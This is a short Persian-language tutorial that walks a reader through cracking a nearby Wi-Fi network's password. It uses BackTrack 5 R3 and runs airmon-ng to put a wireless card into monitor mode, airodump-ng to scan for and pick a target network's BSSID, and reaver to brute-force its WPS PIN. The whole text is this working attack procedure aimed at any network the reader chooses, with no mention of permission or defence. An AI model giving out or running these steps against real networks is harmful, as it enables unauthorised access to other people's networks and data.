مرحله اول:
در قدم اول شما احتیاج به سیستم عامل backtrack 5 r3 دارید.
این سیستم عامل را به هر طریقی که مد نظرتون هست بوت کنید (به وسیله Vmware یا نصب مستقیم)
بعد از بوت شدن با دستور Startx به محیط گرافیکی بروید و از آنجا Command Line را باز کنید.
مرحله دوم:
قبل از شروع اَتک ابتدا باید اطلاعات Network adapter تان را استخراج کنید.
برای بدست آوردن Wireless card از این دستور داخل ترمینال استفاده میکنیم:
airmon-ng
یک دیوایس را نشان میدهد که به BackTrack شما وصل است احتمالا هم اسم اینترفیس آن هم Wlan0 است
حال باید مانیتورینگ مود را در این اینترفیس فعال کنید که دستور آن به شکل زیر است:
airmon-ng start wlan0
این دستور یک وایرلس مانیتور برای شما میسازد و احتمالا با نام mon0
سپس باید با دستور زیر محیط اطرافتان را اسکن کنید:
airodump-ng mon0
حال لیستی از نت ورکهای اطراف را مشاهده میکنید، در قسمت ESSID اسم وایرلس مقصد موجود است، پس از انتخاب اسم وایرلس مورد نظر BSSID آن را کپی کنید .
مرحله 3:
پس از بدست آوردن اطلاعات در مراحل قبلی در این مرحله نوبت آن است که دستور اصلی برای نفوذ را اجرا کنیم
در قالب کد زیر اجرا میکنیم:
reaver -i moninterface -b bssid -vv
به عنوان مثال:
reaver -i mon0 -b 8D:AE:9D:65:1F:B2 –vv
حال ممکن است این پروسس تا چندین ساعت به طول بینجامد، ولی در نهایت به پسورد وای فای موردنظر خواهید رسید.
